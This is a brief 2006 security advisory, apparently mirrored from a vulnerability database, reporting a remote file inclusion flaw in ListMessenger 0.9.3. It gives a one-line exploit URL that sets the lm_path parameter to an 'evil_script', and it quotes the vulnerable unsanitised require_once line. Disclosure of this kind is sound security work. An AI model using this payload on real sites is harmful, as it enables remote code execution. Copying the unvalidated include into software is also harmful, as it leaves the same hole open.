Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13563
HistoryJul 24, 2006 - 12:00 a.m.

ListMessenger v0.9.3 Remote File Inclusion Vulnerability

2006-07-2400:00:00
vulners.com
22

ListMessenger v0.9.3 Remote File Inclusion Vulnerability

Discoverd By : xoron

Conatact : x0r0n[at]hotmail.com

script: ListMessenger 0.9.3

URL: http://www.listmessenger.com

Exp: www.target.com/[path]/enduser/listmessenger.php?lm_path=evil_script?

Code: require_once($lm_path."config.inc.php")

XORON - Cyber-Warrior.org